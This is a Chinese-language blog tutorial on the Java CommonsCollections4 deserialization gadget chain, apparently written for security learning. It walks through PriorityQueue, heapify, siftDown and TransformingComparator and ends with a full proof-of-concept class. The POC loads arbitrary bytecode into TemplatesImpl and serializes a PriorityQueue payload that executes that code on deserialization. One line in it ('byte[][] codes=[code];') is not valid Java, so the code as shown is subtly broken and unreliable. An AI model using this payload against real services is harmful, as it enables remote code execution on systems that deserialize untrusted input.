溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

java安全之CommonsCollections4怎么應(yīng)用

發(fā)布時間:2022-08-18 09:24:32 來源:億速云 閱讀:172 作者:iii 欄目:開發(fā)技術(shù)

這篇文章主要介紹“java安全之CommonsCollections4怎么應(yīng)用”的相關(guān)知識,小編通過實(shí)際案例向大家展示操作過程,操作方法簡單快捷,實(shí)用性強(qiáng),希望這篇“java安全之CommonsCollections4怎么應(yīng)用”文章能幫助大家解決問題。

    引子

    CC4簡單來說就是CC3前半部分和CC2后半部分拼接組成的,對于其利用的限制條件與CC2一致,一樣需要在commons-collections-4.0版本使用,原因是TransformingComparator類在3.1-3.2.1版本中還沒有實(shí)現(xiàn)Serializable接口,無法被反序列化。

    PriorityQueue

    PriorityQueue是一個優(yōu)先隊(duì)列,作用是用來排序,重點(diǎn)在于每次排序都要觸發(fā)傳入的比較器comparator的compare()方法 在CC2中,此類用于調(diào)用PriorityQueue重寫的readObject來作為觸發(fā)入口

    PriorityQueue中的readObject間接調(diào)用了compare() 而compare()最終調(diào)用了transform()

    readobject()方法

    private void readObject(java.io.ObjectInputStream s)
        throws java.io.IOException, ClassNotFoundException {
        // Read in size, and any hidden stuff
        s.defaultReadObject();
        // Read in (and discard) array length
        s.readInt();
        queue = new Object[size];
        // Read in all elements.
        for (int i = 0; i < size; i++)
            queue[i] = s.readObject();
        // Elements are guaranteed to be in "proper order", but the
        // spec has never explained what that might be.
        heapify();
    }

    重寫了該方法并在最后調(diào)用了heapify()方法,我們跟進(jìn)一下:

    private void heapify() {
        for (int i = (size >>> 1) - 1; i >= 0; i--)
            siftDown(i, (E) queue[i]);
    }

    這里的話需要長度等于2才能進(jìn)入for循環(huán),我們要怎樣改變長度呢。

    這里用到的是該類的add方法,將指定的元素插入此優(yōu)先級隊(duì)列。

    heapify()調(diào)用了siftdown()方法

    繼續(xù)跟進(jìn):

    private void siftDown(int k, E x) {
        if (comparator != null)
            siftDownUsingComparator(k, x);
        else
            siftDownComparable(k, x);
    }

    可以看到判斷條件

     if (comparator != null)

    調(diào)用了

    siftDownUsingComparator(k, x);

    在siftDownUsingComparator()又調(diào)用了 comparator.compare()。

    TransformingComparator

    可以看到該類在CC3的版本中不能反序列化,在CC4的版本中便可以了。

    TransformingComparator是一個修飾器,和CC1中的ChainedTransformer類似。

    TransformingComparator里面存在compare方法,當(dāng)我們調(diào)用時就會調(diào)用傳入transformer對象的transform方法具體實(shí)現(xiàn)是this.transformer在傳入ChainedTransformer后,會調(diào)用ChainedTransformer#transform反射鏈。

    問題

    1.就像剛才heapify里面所說的

    private void heapify() {
        for (int i = (size >>> 1) - 1; i >= 0; i--)
            siftDown(i, (E) queue[i]);
    }

    我們要進(jìn)入循環(huán)要修改值,通過add方法。

    priorityQueue.add(1);
    priorityQueue.add(2);

    2.initialCapacity的值要大于1

    3.comparator != null

    4.通過反射來修改值防止在反序列化前調(diào)用,就如之前的鏈一樣,我們到利用時再用反射修改參數(shù)。

    類似這個樣子:

    Class c=transformingComparator.getClass();
            Field transformField=c.getDeclaredField("transformer");
            transformField.setAccessible(true);
            transformField.set(transformingComparator,chainedTransformer);

    我們先放置個反序列化前不會執(zhí)行這條鏈的隨便一個參數(shù):

    TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));

    POC

    package ysoserial;
    import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
    import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
    import javassist.convert.TransformWriteField;
    import org.apache.commons.collections4.Transformer;
    import org.apache.commons.collections4.comparators.TransformingComparator;
    import org.apache.commons.collections4.functors.ChainedTransformer;
    import org.apache.commons.collections4.functors.ConstantTransformer;
    import org.apache.commons.collections4.functors.InstantiateTransformer;
    import org.apache.commons.collections4.functors.InvokerTransformer;
    import org.apache.commons.collections4.map.LazyMap;
    import org.apache.xalan.xsltc.trax.TrAXFilter;
    import javax.xml.crypto.dsig.Transform;
    import javax.xml.transform.Templates;
    import java.io.*;
    import java.lang.reflect.*;
    import java.nio.file.Files;
    import java.nio.file.Paths;
    import java.util.HashMap;
    import java.util.Map;
    import java.util.PriorityQueue;
    public class cc4 {
        public static void main(String[] args) throws Exception {
            TemplatesImpl templates=new TemplatesImpl();
            Class tc=templates.getClass();
            Field nameField=tc.getDeclaredField("_name");
            nameField.setAccessible(true);
            nameField.set(templates,"XINO");
            Field bytecodesField=tc.getDeclaredField("_bytecodes");
            bytecodesField.setAccessible(true);
            byte[] code = Files.readAllBytes(Paths.get("D://tmp/test.class"));
            byte[][] codes=[code];
            bytecodesField.set(templates,codes);
            Field tfactoryField=tc.getDeclaredField("_tfactory");
            tfactoryField.setAccessible(true);
            tfactoryField.set(templates,new TransformerFactoryImpl());
            InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
            //
            Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
            };
            ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
            TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
            PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);
            priorityQueue.add(1);
            priorityQueue.add(2);
            Class c=transformingComparator.getClass();
            Field transformField=c.getDeclaredField("transformer");
            transformField.setAccessible(true);
            transformField.set(transformingComparator,chainedTransformer);
            serialize(priorityQueue);
            unserialize("ser.bin");
        }
        public static void serialize(Object obj) throws Exception{
            ObjectOutputStream oss=new ObjectOutputStream(new FileOutputStream("ser.bin"));
            oss.writeObject(obj);
        }
        public static void unserialize(Object obj) throws Exception{
            ObjectInputStream oss=new ObjectInputStream(new FileInputStream("ser.bin"));
            oss.readObject();
        }
    }

    關(guān)于“java安全之CommonsCollections4怎么應(yīng)用”的內(nèi)容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識,可以關(guān)注億速云行業(yè)資訊頻道,小編每天都會為大家更新不同的知識點(diǎn)。

    向AI問一下細(xì)節(jié)

    免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

    AI